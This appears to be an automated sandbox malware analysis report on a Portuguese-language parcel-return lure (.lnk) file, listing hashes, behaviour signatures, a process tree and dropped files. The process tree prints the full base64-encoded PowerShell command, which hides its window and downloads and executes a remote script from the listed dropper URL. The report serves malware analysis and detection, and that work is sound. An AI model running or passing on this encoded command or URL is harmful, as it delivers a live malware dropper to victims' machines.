858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
117s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/09/2024, 19:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2944	powershell.exe
4	2944	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2944	powershell.exe
2944	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2944	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2980 wrote to memory of 2944	2980	cmd.exe	31
PID 2980 wrote to memory of 2944	2980	cmd.exe	31
PID 2980 wrote to memory of 2944	2980	cmd.exe	31
PID 2944 wrote to memory of 1908	2944	powershell.exe	32
PID 2944 wrote to memory of 1908	2944	powershell.exe	32
PID 2944 wrote to memory of 1908	2944	powershell.exe	32
PID 1908 wrote to memory of 1744	1908	csc.exe	33
PID 1908 wrote to memory of 1744	1908	csc.exe	33
PID 1908 wrote to memory of 1744	1908	csc.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2980
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2944
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rd4tvptd.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1908
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84EA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84E9.tmp"
      4⤵
      PID:1744

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES84EA.tmp

Filesize
1KB

MD5
d27b2be0d646920887c532798d41fe80

SHA1
5d32fbb122293969613e0572b91884fede9a8fea

SHA256
60870b764fc9f060ea67201bf732f8f790ddd55370c3287ec7b5696b529e58c7

SHA512
264d6beed7fb6c635aee2b2fd10d144f50789cf71fda4d4f58c15bf46e4b27e7845bf94673506d269f3254278db9cdc3ad02f014fae7e5e3590e00a2c9ffc9de

Download Submit
C:\Users\Admin\AppData\Local\Temp\rd4tvptd.dll

Filesize
3KB

MD5
70a41d2828cd1a589bf12e727f3b8c1a

SHA1
b6e3b4a59a8f982e38f763f37c87b22f8ce5c671

SHA256
f0771b428e36e3114d5f2c87c911ebaa4d9c22f52954dabb883dda499006fe7d

SHA512
5779a660f2993c48487bf8b7dfce9b962a41f389c10abd3e40590bc59223c6c94274be7e91f422b0cf2f24f902fa26924eeec1b0770cca2732deaf6cd8da9050

Download Submit
C:\Users\Admin\AppData\Local\Temp\rd4tvptd.pdb

Filesize
7KB

MD5
081d7f0dc34387559d9b78b98b8aeeaa

SHA1
09d6d80986db00246e30b5b42ea034db3bdf17a7

SHA256
fbc60db47191b5a15ce98971b831a41954150f5267e31fbe6067ef1c363c0732

SHA512
f824bac691c2b9b75179c5ed1c9b688522a9bec399be9c5982314feb1fe61d5059a4feac12a9328e8688a649deaad0c362be9040a28f51b6f204bf2ee0577e61

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC84E9.tmp

Filesize
652B

MD5
109efc988aa578dd7d9b8bb71653914f

SHA1
4dc3a8eb10e7248f50b9e9f088e8174d43b5f36e

SHA256
a71856751772b8f336af1464acec9fce51be825f513312bfbc05a2171a1b09f0

SHA512
f18bd857dcc5f1e9e68fb8a23d224a17f28c003c030d5f3b8cc1432c50ad54beaf4c0308f6c9a5d89a479587d7b801dc267dcddd4330d0cdb3c90c99e31e5d63

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rd4tvptd.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rd4tvptd.cmdline

Filesize
309B

MD5
3779b1faed9aa2f055dd6d1b1f88e044

SHA1
20417b40462c2272d22e49567652712c1cb25792

SHA256
e617add30b4580550d18da45ac1383aefbeea02544df0d20a4f103b0af57d0b4

SHA512
280423d50e27e6a89846b1c01230272cd11a53e92d487f06c8ecab3c70fcde9089356ba77f80d16e621e93bfe34f80dc9a7cfdbd21864b453d8386a42f3bda3d

Download Submit
memory/2944-42-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/2944-45-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2944-38-0x000007FEF5B8E000-0x000007FEF5B8F000-memory.dmp

Filesize
4KB

Download
memory/2944-44-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2944-43-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2944-59-0x0000000002AE0000-0x0000000002AE8000-memory.dmp

Filesize
32KB

Download
memory/2944-41-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2944-40-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download
memory/2944-39-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

Filesize
2.9MB

Download
memory/2944-62-0x000007FEF58D0000-0x000007FEF626D000-memory.dmp

Filesize
9.6MB

Download